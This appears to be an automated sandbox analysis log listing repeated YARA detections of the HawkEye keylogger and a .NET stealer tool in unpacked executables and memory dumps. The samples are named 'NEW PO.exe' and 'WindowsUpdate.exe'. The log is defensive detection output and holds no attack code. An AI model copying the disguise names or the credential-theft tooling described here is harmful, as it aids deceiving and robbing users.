Source: 7.0.NEW PO.exe.2d9bffc.33.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.409c0d.18.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.409c0d.18.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.8660000.36.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.408208.24.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.408208.24.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.408208.24.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.400000.37.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.400000.37.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.400000.37.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.409c0d.27.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.409c0d.27.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.408208.28.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.408208.28.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.408208.28.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.408208.41.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.408208.41.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.408208.41.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.WindowsUpdate.exe.45fa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.2.WindowsUpdate.exe.45fa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.408208.22.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.408208.22.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.408208.22.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.WindowsUpdate.exe.402fbd0.5.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 15.2.WindowsUpdate.exe.402fbd0.5.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.2.WindowsUpdate.exe.402fbd0.5.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.409c0d.19.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.409c0d.19.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.45fa72.9.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.45fa72.9.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.45fa72.29.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.45fa72.29.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.408208.18.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.408208.18.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.408208.18.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.7c60000.48.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.400000.26.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.400000.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.400000.26.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.NEW PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.2.NEW PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.NEW PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.409c0d.24.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.409c0d.24.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.408208.18.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.408208.18.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.WindowsUpdate.exe.408208.18.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.NEW PO.exe.474fbd0.5.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.NEW PO.exe.474fbd0.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.NEW PO.exe.474fbd0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.NEW PO.exe.43c56d8.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.NEW PO.exe.43c56d8.3.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.NEW PO.exe.43c56d8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.WindowsUpdate.exe.3e88750.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 15.2.WindowsUpdate.exe.3e88750.3.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.2.WindowsUpdate.exe.3e88750.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.NEW PO.exe.45a8750.4.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.NEW PO.exe.45a8750.4.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.NEW PO.exe.45a8750.4.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.WindowsUpdate.exe.43f8750.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 17.2.WindowsUpdate.exe.43f8750.3.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.2.WindowsUpdate.exe.43f8750.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.WindowsUpdate.exe.333ba6c.6.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.WindowsUpdate.exe.42156d8.5.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 17.2.WindowsUpdate.exe.42156d8.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.2.WindowsUpdate.exe.42156d8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.391647562.000000000358E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.320473195.0000000007EE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000012.00000000.400119443.000000000359A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.439571003.0000000008640000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.317923125.0000000002D5E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
